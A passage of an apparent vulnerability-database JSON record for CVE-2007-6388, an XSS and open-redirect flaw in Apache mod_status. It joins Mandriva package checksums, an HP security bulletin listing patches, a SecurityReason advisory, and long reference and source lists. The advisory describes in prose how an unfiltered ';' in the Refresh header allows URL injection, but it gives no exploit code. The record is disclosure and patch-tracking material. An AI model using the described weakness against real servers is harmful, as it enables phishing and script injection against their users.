2008.0/i586/apache-mod_dbd-2.2.6-8.1mdv2008.0.i586.rpm\n cfc6f2958ef8d117d1070e422078cdfa  2008.0/i586/apache-mod_deflate-2.2.6-8.1mdv2008.0.i586.rpm\n 3c423e687c0afc1b224e6535e16ec279  2008.0/i586/apache-mod_disk_cache-2.2.6-8.1mdv2008.0.i586.rpm\n ef790e64feeaf1a9ee5c58fd7e3b359d  2008.0/i586/apache-mod_file_cache-2.2.6-8.1mdv2008.0.i586.rpm\n 8f86f4c499dfa14fb2daf4f8b578e150  2008.0/i586/apache-mod_ldap-2.2.6-8.1mdv2008.0.i586.rpm\n 21b1fc690f38b779ee79bed31c5fa3a2  2008.0/i586/apache-mod_mem_cache-2.2.6-8.1mdv2008.0.i586.rpm\n 0ec954d20d7a080cc9a19c2146480897  2008.0/i586/apache-mod_proxy-2.2.6-8.1mdv2008.0.i586.rpm\n 50a87c9099f0c094c9fbb763e334fae9  2008.0/i586/apache-mod_proxy_ajp-2.2.6-8.1mdv2008.0.i586.rpm\n 9d4e1c4a6614e70b77cd2e03e3baeaea  2008.0/i586/apache-mod_ssl-2.2.6-8.1mdv2008.0.i586.rpm\n 29346499f10a850f8011191b0d242709  2008.0/i586/apache-mod_userdir-2.2.6-8.1mdv2008.0.i586.rpm\n 21c5bc6f2861cc532c8b5dae3f3e1ee2  2008.0/i586/apache-modules-2.2.6-8.1mdv2008.0.i586.rpm\n 944b6d2f395f4d26deeef93f9ce55c5b  2008.0/i586/apache-mpm-event-2.2.6-8.1mdv2008.0.i586.rpm\n 0fc46d4eae684b21a9a98a6c876960b3  2008.0/i586/apache-mpm-itk-2.2.6-8.1mdv2008.0.i586.rpm\n ab00a26cd43e9045e66da620e9678412  2008.0/i586/apache-mpm-prefork-2.2.6-8.1mdv2008.0.i586.rpm\n 785499e86b70da53c76a7d3321da1b30  2008.0/i586/apache-mpm-worker-2.2.6-8.1mdv2008.0.i586.rpm\n c1ccaf747ebe4bd71f875f70c969d4e7  2008.0/i586/apache-source-2.2.6-8.1mdv2008.0.i586.rpm \n 2d535ab37b9a247e827054766219f7e6  2008.0/SRPMS/apache-2.2.6-8.1mdv2008.0.src.rpm\n\n Mandriva Linux 2008.0/X86_64:\n 56b868f5c7a86b68666af13fe2a5c925  2008.0/x86_64/apache-base-2.2.6-8.1mdv2008.0.x86_64.rpm\n 16ca885969a1bd9d7f6d4a00a7c33095  2008.0/x86_64/apache-devel-2.2.6-8.1mdv2008.0.x86_64.rpm\n 76bcdbe509c56ec471ff767f5f7f925f  2008.0/x86_64/apache-htcacheclean-2.2.6-8.1mdv2008.0.x86_64.rpm\n 36fc978398d6b8f406f0913ecac5576e  2008.0/x86_64/apache-mod_authn_dbd-2.2.6-8.1mdv2008.0.x86_64.rpm\n d6644c5729325e3a0f7bda5ffe12523c  2008.0/x86_64/apache-mod_cache-2.2.6-8.1mdv2008.0.x86_64.rpm\n 98e86f62995310727dc7b7343776c948  2008.0/x86_64/apache-mod_dav-2.2.6-8.1mdv2008.0.x86_64.rpm\n 7aa7da7cb9fc4f29071535620de42023  2008.0/x86_64/apache-mod_dbd-2.2.6-8.1mdv2008.0.x86_64.rpm\n 8cb681d914e9619adf261dca86154538  2008.0/x86_64/apache-mod_deflate-2.2.6-8.1mdv2008.0.x86_64.rpm\n 1ebc35b8050495230d6809f97dd89731  2008.0/x86_64/apache-mod_disk_cache-2.2.6-8.1mdv2008.0.x86_64.rpm\n 7db7d64521dc4253edc59645e79a5e57  2008.0/x86_64/apache-mod_file_cache-2.2.6-8.1mdv2008.0.x86_64.rpm\n 5624b75d6d1eb311e6332c6a7e10e42f  2008.0/x86_64/apache-mod_ldap-2.2.6-8.1mdv2008.0.x86_64.rpm\n e7049015c893a5a75d0c4bbc68e18615  2008.0/x86_64/apache-mod_mem_cache-2.2.6-8.1mdv2008.0.x86_64.rpm\n 910e8bcb28e00501ebd39aa9c30e3cad  2008.0/x86_64/apache-mod_proxy-2.2.6-8.1mdv2008.0.x86_64.rpm\n 2451f7726434398f715bac328422faa8  2008.0/x86_64/apache-mod_proxy_ajp-2.2.6-8.1mdv2008.0.x86_64.rpm\n c6a102776378eecfbe64f87d2a4f261b  2008.0/x86_64/apache-mod_ssl-2.2.6-8.1mdv2008.0.x86_64.rpm\n 27a79220cf963ba1dfe6f17d6e66d3f5  2008.0/x86_64/apache-mod_userdir-2.2.6-8.1mdv2008.0.x86_64.rpm\n e87a2f8d0e8cf23fe0cc3a7a44195f68  2008.0/x86_64/apache-modules-2.2.6-8.1mdv2008.0.x86_64.rpm\n 6224d03ea5169e71fd588ddff0b95f16  2008.0/x86_64/apache-mpm-event-2.2.6-8.1mdv2008.0.x86_64.rpm\n e61bcd69bd997a5cddacc2f58dd1f1b9  2008.0/x86_64/apache-mpm-itk-2.2.6-8.1mdv2008.0.x86_64.rpm\n 304a7257ba0104bb799c3ab6a09cb977  2008.0/x86_64/apache-mpm-prefork-2.2.6-8.1mdv2008.0.x86_64.rpm\n d19f57238828efc73f24ff69c1dca341  2008.0/x86_64/apache-mpm-worker-2.2.6-8.1mdv2008.0.x86_64.rpm\n e72351edf865715beac70996ca1ea09b  2008.0/x86_64/apache-source-2.2.6-8.1mdv2008.0.x86_64.rpm \n 2d535ab37b9a247e827054766219f7e6  2008.0/SRPMS/apache-2.2.6-8.1mdv2008.0.src.rpm\n\n Corporate 4.0:\n 0c36f90139943f6564058fb6c9a0028c  corporate/4.0/i586/apache-base-2.2.3-1.3.20060mlcs4.i586.rpm\n 2c23db7c0c820a6d05cf9e89e10d437b  corporate/4.0/i586/apache-devel-2.2.3-1.3.20060mlcs4.i586.rpm\n 6729c4c238ea40547ca8ad4ad34fac39  corporate/4.0/i586/apache-htcacheclean-2.2.3-1.3.20060mlcs4.i586.rpm\n 8c6b35f7192abf90e6af6a07c27099d0  corporate/4.0/i586/apache-mod_authn_dbd-2.2.3-1.3.20060mlcs4.i586.rpm\n 6f3ae30580187b440261747c0f975ec6  corporate/4.0/i586/apache-mod_cache-2.2.3-1.3.20060mlcs4.i586.rpm\n 56dd118e6e37165e6638baab4e58d08e  corporate/4.0/i586/apache-mod_dav-2.2.3-1.3.20060mlcs4.i586.rpm\n 6e3512489622cf59e0f32458d943f65b  corporate/4.0/i586/apache-mod_dbd-2.2.3-1.3.20060mlcs4.i586.rpm\n 7946432730bdac3ec21ca376f8f8ca12  corporate/4.0/i586/apache-mod_deflate-2.2.3-1.3.20060mlcs4.i586.rpm\n eeac05dfe0a57512de566f6a2e1e105e  corporate/4.0/i586/apache-mod_disk_cache-2.2.3-1.3.20060mlcs4.i586.rpm\n b50af44b3084fcff0bc6cff1ac50023f  corporate/4.0/i586/apache-mod_file_cache-2.2.3-1.3.20060mlcs4.i586.rpm\n a92816a879182cbca50ebace4bb5f193  corporate/4.0/i586/apache-mod_ldap-2.2.3-1.3.20060mlcs4.i586.rpm\n 2ca6a18de738a817cb346f1eb31bf76a  corporate/4.0/i586/apache-mod_mem_cache-2.2.3-1.3.20060mlcs4.i586.rpm\n b984ff19a2458f844f62be84635060d1  corporate/4.0/i586/apache-mod_proxy-2.2.3-1.3.20060mlcs4.i586.rpm\n b816b9c09345b92da5a0216f5e9db932  corporate/4.0/i586/apache-mod_proxy_ajp-2.2.3-1.3.20060mlcs4.i586.rpm\n 240fb4ea33d91846fc083def26b19465  corporate/4.0/i586/apache-mod_ssl-2.2.3-1.3.20060mlcs4.i586.rpm\n afcda5d86a48edba71a81a8fda0d0f75  corporate/4.0/i586/apache-mod_userdir-2.2.3-1.3.20060mlcs4.i586.rpm\n 76705f36eb869b9a1520df0c09a7d1e9  corporate/4.0/i586/apache-modules-2.2.3-1.3.20060mlcs4.i586.rpm\n eb5bc900fa99aab700c29af7978ca44f  corporate/4.0/i586/apache-mpm-prefork-2.2.3-1.3.20060mlcs4.i586.rpm\n 57a7cb6d3fc97eca6c46685f606a3618  corporate/4.0/i586/apache-mpm-worker-2.2.3-1.3.20060mlcs4.i586.rpm\n 804752d26fd2db2088cbc73ee9aee8f5  corporate/4.0/i586/apache-source-2.2.3-1.3.20060mlcs4.i586.rpm \n ece351bfa879df71f200f00d143779b9  corporate/4.0/SRPMS/apache-2.2.3-1.3.20060mlcs4.src.rpm\n\n Corporate 4.0/X86_64:\n 74d411bb422230857a8971a9ce428c0e  corporate/4.0/x86_64/apache-base-2.2.3-1.3.20060mlcs4.x86_64.rpm\n 5ede29fb5e502fdc96dbb4722b69bb26  corporate/4.0/x86_64/apache-devel-2.2.3-1.3.20060mlcs4.x86_64.rpm\n dcecf6dece1ec0c083f924b8e545b864  corporate/4.0/x86_64/apache-htcacheclean-2.2.3-1.3.20060mlcs4.x86_64.rpm\n b7bf0d94f575d6e1e42296b69e5d056b  corporate/4.0/x86_64/apache-mod_authn_dbd-2.2.3-1.3.20060mlcs4.x86_64.rpm\n 6718af7bd108e06d8e6be0046473ce69  corporate/4.0/x86_64/apache-mod_cache-2.2.3-1.3.20060mlcs4.x86_64.rpm\n fce075627de036b3d71a93ceafa6105e  corporate/4.0/x86_64/apache-mod_dav-2.2.3-1.3.20060mlcs4.x86_64.rpm\n 973a484aed44fd0281c34a0227131400  corporate/4.0/x86_64/apache-mod_dbd-2.2.3-1.3.20060mlcs4.x86_64.rpm\n 359ad6bfc294b82d14788ea3f2fb5b1f  corporate/4.0/x86_64/apache-mod_deflate-2.2.3-1.3.20060mlcs4.x86_64.rpm\n ce014700683860f81922680ab29d335b  corporate/4.0/x86_64/apache-mod_disk_cache-2.2.3-1.3.20060mlcs4.x86_64.rpm\n b918e9b9eeb06303a8b3f26f63666f74  corporate/4.0/x86_64/apache-mod_file_cache-2.2.3-1.3.20060mlcs4.x86_64.rpm\n 969c3cf38987f91d576de441e5781b5d  corporate/4.0/x86_64/apache-mod_ldap-2.2.3-1.3.20060mlcs4.x86_64.rpm\n e3c4128b336c45e9470e57a1439cead9  corporate/4.0/x86_64/apache-mod_mem_cache-2.2.3-1.3.20060mlcs4.x86_64.rpm\n e6c07bd0bed38660852db97807e0b3dd  corporate/4.0/x86_64/apache-mod_proxy-2.2.3-1.3.20060mlcs4.x86_64.rpm\n d6b2621b48abe4c74ecd5e24e7c3c9f9  corporate/4.0/x86_64/apache-mod_proxy_ajp-2.2.3-1.3.20060mlcs4.x86_64.rpm\n 166b443903e18e77afee950f368ae763  corporate/4.0/x86_64/apache-mod_ssl-2.2.3-1.3.20060mlcs4.x86_64.rpm\n bcbd01a168655d57ad7dcbf424b4d91a  corporate/4.0/x86_64/apache-mod_userdir-2.2.3-1.3.20060mlcs4.x86_64.rpm\n 3723d163f681e478e677c75a286f352e  corporate/4.0/x86_64/apache-modules-2.2.3-1.3.20060mlcs4.x86_64.rpm\n f17cbd7d765045b30dd43f62efb7cfd3  corporate/4.0/x86_64/apache-mpm-prefork-2.2.3-1.3.20060mlcs4.x86_64.rpm\n 6e704ce4a8ab0b5817273af16b997ea2  corporate/4.0/x86_64/apache-mpm-worker-2.2.3-1.3.20060mlcs4.x86_64.rpm\n f35f2e3795dba910451ac03ec63f8898  corporate/4.0/x86_64/apache-source-2.2.3-1.3.20060mlcs4.x86_64.rpm \n ece351bfa879df71f200f00d143779b9  corporate/4.0/SRPMS/apache-2.2.3-1.3.20060mlcs4.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi.  The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c01607570\nVersion: 1\n\nHPSBMA02388 SSRT080059 rev.1 - HP OpenView Network Node Manager (OV NNM), Remote Cross Site Scripting (XSS)\n\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible. \n\nRelease Date: 2008-11-19\nLast Updated: 2008-11-19\n\nPotential Security Impact: Remote cross site scripting (XSS)\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM). The vulnerabilities could be exploited remotely to allow cross site scripting (XSS). \n\nReferences: CVE-2007-6388, CVE-2007-5000\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP OpenView Network Node Manager (OV NNM) v7.01, v7.51, v7.53 running on HP-UX, Linux, and Solaris\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics \n===============================================\nReference                         Base Vector               Base Score \nCVE-2007-6388     (AV:N/AC:M/Au:N/C:N/I:P/A:N)      4.3\nCVE-2007-5000     (AV:N/AC:M/Au:N/C:N/I:P/A:N)      4.3\n===============================================\nInformation on CVSS is documented in HP Customer Notice: HPSN-2008-002. \n\nRESOLUTION\n\nHP has made patches available to resolve the vulnerabilities. \n\nThe patches are available from http://itrc.hp.com \n\nOV NNM v7.53 \n===========\nOperating_System - HP-UX (IA)\nResolved in Patch - PHSS_38148 or subsequent\n \nOperating_System - HP-UX (PA)\nResolved in Patch - PHSS_38147 or subsequent\n \nOperating_System - Linux RedHatAS2.1 \nResolved in Patch - LXOV_00085 or subsequent\n \nOperating_System - Linux RedHat4AS-x86_64 \nResolved in Patch - LXOV_00086 or subsequent\n \nOperating_System - Solaris\nResolved in Patch - PSOV_03514 or subsequent\n \nOV NNM v7.51 \n===========\nUpgrade to NNM v7.53 and install the patches listed above. \n\nOV NNM v7.01 \n===========\nOperating_System - HP-UX (PA)\nResolved in Patch - PHSS_38761 or subsequent\n \nOperating_System - Solaris\nResolved in Patch - PSOV_03516 or subsequent\n \n\nMANUAL ACTIONS: Yes - NonUpdate \nApply the appropriate file as described in the Resolution. \n\nPRODUCT SPECIFIC INFORMATION \n\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa \n\nThe following text is for use by the HP-UX Software Assistant. \n\nAFFECTED VERSIONS (for HP-UX)\n\nFor HP-UX OV NNM 7.53 \nHP-UX B.11.31 \nHP-UX B.11.23 (IA) \n============= \nOVNNMgr.OVNNM-RUN \naction: install PHSS_38148 or subsequent \nURL: http://itrc.hp.com \n\nHP-UX B.11.23 (PA) \nHP-UX B.11.11 \n============= \nOVNNMgr.OVNNM-RUN \naction: install PHSS_38147 or subsequent \nURL: http://itrc.hp.com \n\nFor HP-UX OV NNM 7.51 \nHP-UX B.11.31 \nHP-UX B.11.23 \nHP-UX B.11.11 \n============= \nOVNNMgr.OVNNM-RUN \naction: upgrade NNM v7.51 to NNM v7.53 and apply the appropriate patches \n\nFor HP-UX OV NNM 7.01 \nHP-UX B.11.00 \nHP-UX B.11.11 \n============= \nOVNNMgr.OVNNM-RUN \naction: install PHSS_38761 or subsequent \nURL: http://itrc.hp.com \n\nEND AFFECTED VERSIONS (for HP-UX)\n\nHISTORY \nVersion:1 (rev.1) - 19 November 2008 Initial release \n\nThird Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer\u0027s patch management policy. \n\nSupport: For further information, contact normal HP Services support channel. \n\nReport: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com \nIt is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. \nTo get the security-alert PGP key, please send an e-mail message as follows:\n  To: security-alert@hp.com \n  Subject: get key\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email: \nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA\u0026langcode=USENG\u0026jumpid=in_SC-GEN__driverITRC\u0026topiccode=ITRC \nOn the web page: ITRC security bulletins and patch sign-up \nUnder Step1: your ITRC security bulletins and patches \n  - check ALL categories for which alerts are required and continue. \nUnder Step2: your ITRC operating systems \n  - verify your operating system selections are checked and save. \n\n\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php \nLog in on the web page: Subscriber\u0027s choice for Business: sign-in. \nOn the web page: Subscriber\u0027s Choice: your profile summary - use Edit Profile to update appropriate sections. \n\n\nTo review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do \n\n\n* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: \n\nGN = HP General SW\nMA = HP Management Agents\nMI = Misc. 3rd Party SW\nMP = HP MPE/iX\nNS = HP NonStop Servers\nOV = HP OpenVMS\nPI = HP Printing \u0026 Imaging\nST = HP Storage SW\nTL = HP Trusted Linux\nTU = HP Tru64 UNIX\nUX = HP-UX\nVV = HP VirtualVault\n \nSystem management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. \n\n\n\"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user\u0027s use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.\"\n\n\\xa9Copyright 2008 Hewlett-Packard Development Company, L.P. \n\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided \"as is\" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. \n-----BEGIN PGP SIGNATURE-----\nVersion: PGP 8.1\n\niQA/AwUBSSQhVOAfOvwtKn1ZEQIlVQCg4n4fABzC24c9qQ5gz68oPLMVKI0AoMbs\nA2UIaH3YB7z+o42Tm7Eg7ahn\n=lskD\n-----END PGP SIGNATURE-----\n. The goal of this project is to\nprovide a secure, efficient and extensible server that provides\nHTTP services in sync with the current HTTP standards. \n\nApache has been the most popular web server on the Internet since\nApril 1996. The November 2005 Netcraft Web Server Survey found\nthat more than 70% of the web sites on the Internet are using\nApache, thus making it more widely used than all other web\nservers combined. \n\nmod_status : http://httpd.apache.org/docs/2.0/mod/mod_status.html\n\n- From apache site : \"The Status module allows a server administrator to find out how well their server is performing. A HTML page is presented that gives the current server statistics in an easily readable form. If required this page can be made to automatically refresh (given a compatible browser). Another page gives a simple machine-readable list of the current server state.\"\n\n- --- 1. Apache Refresh Header - Open Redirector (XSS) Vulnerability ---\n\nDuring the fact that Apache mod_status do not filter char \";\" we can inject new URL. \nThis fact give attacker open redirector and can lead to phishing attack. \nAlso attacker can create more advanced method to trigger XSS on victim\u0027s browser. Exploit ---\n\nSecurityReason is not going to release a exploit to the general public. \nExploit was provided and tested for Apache Team . References ---\n\nA Refreshing Look at Redirection : http://www.securityfocus.com/archive/1/450418 by Amit Klein\n\n- --- 5. Greets ---\n\nFor: Maksymilian Arciemowicz ( cXIb8O3 ), Infospec, pi3, p_e_a, mpp\n\n- --- 6. \nHP-UX B.11.11, B.11.23, B.11.31 running Apache v2.0.59.00.2 or earlier",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2007-6388"
          },
          {
            "db": "BID",
            "id": "27237"
          },
          {
            "db": "VULMON",
            "id": "CVE-2007-6388"
          },
          {
            "db": "PACKETSTORM",
            "id": "62720"
          },
          {
            "db": "PACKETSTORM",
            "id": "89987"
          },
          {
            "db": "PACKETSTORM",
            "id": "80533"
          },
          {
            "db": "PACKETSTORM",
            "id": "62719"
          },
          {
            "db": "PACKETSTORM",
            "id": "62721"
          },
          {
            "db": "PACKETSTORM",
            "id": "72120"
          },
          {
            "db": "PACKETSTORM",
            "id": "62634"
          },
          {
            "db": "PACKETSTORM",
            "id": "63601"
          }
        ],
        "trust": 1.98
      },
      "external_ids": {
        "_id": null,
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2007-6388",
            "trust": 2.2
          },
          {
            "db": "BID",
            "id": "27237",
            "trust": 1.4
          },
          {
            "db": "SECUNIA",
            "id": "29988",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "28607",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "28977",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "30732",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "30430",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "28471",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "29504",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "28526",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "29806",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "33200",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "28749",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "28922",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "30356",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "29640",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "32800",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31142",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "29420",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "28965",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "28467",
            "trust": 1.1
          },
          {
            "db": "USCERT",
            "id": "TA08-150A",
            "trust": 1.1
          },
          {
            "db": "SREASON",
            "id": "3541",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-0809",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-0047",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-1623",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-1697",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-0554",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-0447",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-0924",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-1224",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-0986",
            "trust": 1.1
          },
          {
            "db": "SECTRACK",
            "id": "1019154",
            "trust": 1.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2007-6388",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "62720",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "89987",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "80533",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "62719",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "62721",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "72120",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "62634",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "63601",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2007-6388"
          },
          {
            "db": "BID",
            "id": "27237"
          },
          {
            "db": "PACKETSTORM",
            "id": "62720"
          },
          {
            "db": "PACKETSTORM",
            "id": "89987"
          },
          {
            "db": "PACKETSTORM",
            "id": "80533"
          },
          {
            "db": "PACKETSTORM",
            "id": "62719"
          },
          {
            "db": "PACKETSTORM",
            "id": "62721"
          },
          {
            "db": "PACKETSTORM",
            "id": "72120"
          },
          {
            "db": "PACKETSTORM",
            "id": "62634"
          },
          {
            "db": "PACKETSTORM",
            "id": "63601"
          },
          {
            "db": "NVD",
            "id": "CVE-2007-6388"
          }
        ]
      },
      "id": "VAR-200801-0561",
      "iot": {
        "_id": null,
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.16519225
      },
      "last_update_date": "2026-04-10T22:12:11.276000Z",
      "patch": {
        "_id": null,
        "data": [
          {
            "title": "Ubuntu Security Notice: apache2 vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-575-1"
          },
          {
            "title": "",
            "trust": 0.1,
            "url": "https://github.com/SecureAxom/strike "
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2007-6388"
          }
        ]
      },
      "problemtype_data": {
        "_id": null,
        "data": [
          {
            "problemtype": "CWE-79",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2007-6388"
          }
        ]
      },
      "references": {
        "_id": null,
        "data": [
          {
            "trust": 1.5,
            "url": "http://httpd.apache.org/security/vulnerabilities_13.html"
          },
          {
            "trust": 1.5,
            "url": "http://httpd.apache.org/security/vulnerabilities_20.html"
          },
          {
            "trust": 1.5,
            "url": "http://httpd.apache.org/security/vulnerabilities_22.html"
          },
          {
            "trust": 1.4,
            "url": "http://support.avaya.com/elmodocs2/security/asa-2008-032.htm"
          },
          {
            "trust": 1.4,
            "url": "http://support.nortel.com/go/main.jsp?cscat=bltndetail\u0026id=689039"
          },
          {
            "trust": 1.4,
            "url": "http://www-1.ibm.com/support/docview.wss?uid=swg1pk62966"
          },
          {
            "trust": 1.4,
            "url": "http://www-1.ibm.com/support/docview.wss?uid=swg1pk63273"
          },
          {
            "trust": 1.4,
            "url": "http://www-1.ibm.com/support/docview.wss?uid=swg24019245"
          },
          {
            "trust": 1.4,
            "url": "http://www.fujitsu.com/global/support/software/security/products-f/interstage-200808e.html"
          },
          {
            "trust": 1.4,
            "url": "http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html"
          },
          {
            "trust": 1.2,
            "url": "http://www.securityfocus.com/bid/27237"
          },
          {
            "trust": 1.1,
            "url": "http://securitytracker.com/id?1019154"
          },
          {
            "trust": 1.1,
            "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2008:014"
          },
          {
            "trust": 1.1,
            "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2008:015"
          },
          {
            "trust": 1.1,
            "url": "http://www.redhat.com/support/errata/rhsa-2008-0004.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.redhat.com/support/errata/rhsa-2008-0005.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.redhat.com/support/errata/rhsa-2008-0006.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.redhat.com/support/errata/rhsa-2008-0007.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.redhat.com/support/errata/rhsa-2008-0008.html"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/28467"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/28471"
          },
          {
            "trust": 1.1,
            "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2008:016"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/28526"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/28607"
          },
          {
            "trust": 1.1,
            "url": "http://www.ubuntu.com/usn/usn-575-1"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/28749"
          },
          {
            "trust": 1.1,
            "url": "http://www116.nortel.com/pub/repository/clarify/document/2008/05/023342-01.pdf"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/28965"
          },
          {
            "trust": 1.1,
            "url": "https://www.redhat.com/archives/fedora-package-announce/2008-february/msg00562.html"
          },
          {
            "trust": 1.1,
            "url": "https://www.redhat.com/archives/fedora-package-announce/2008-february/msg00541.html"
          },
          {
            "trust": 1.1,
            "url": "http://slackware.com/security/viewer.php?l=slackware-security\u0026y=2008\u0026m=slackware-security.595748"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/28977"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/28922"
          },
          {
            "trust": 1.1,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-233623-1"
          },
          {
            "trust": 1.1,
            "url": "http://docs.info.apple.com/article.html?artnum=307562"
          },
          {
            "trust": 1.1,
            "url": "http://lists.apple.com/archives/security-announce/2008/mar/msg00001.html"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/29420"
          },
          {
            "trust": 1.1,
            "url": "http://www-1.ibm.com/support/search.wss?rs=0\u0026q=pk59667\u0026apar=only"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/29504"
          },
          {
            "trust": 1.1,
            "url": "http://securityreason.com/securityalert/3541"
          },
          {
            "trust": 1.1,
            "url": "http://lists.opensuse.org/opensuse-security-announce/2008-04/msg00004.html"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/29640"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/29806"
          },
          {
            "trust": 1.1,
            "url": "http://www.redhat.com/support/errata/rhsa-2008-0009.html"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/29988"
          },
          {
            "trust": 1.1,
            "url": "http://www.redhat.com/support/errata/rhsa-2008-0261.html"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/30356"
          },
          {
            "trust": 1.1,
            "url": "http://lists.apple.com/archives/security-announce/2008//may/msg00001.html"
          },
          {
            "trust": 1.1,
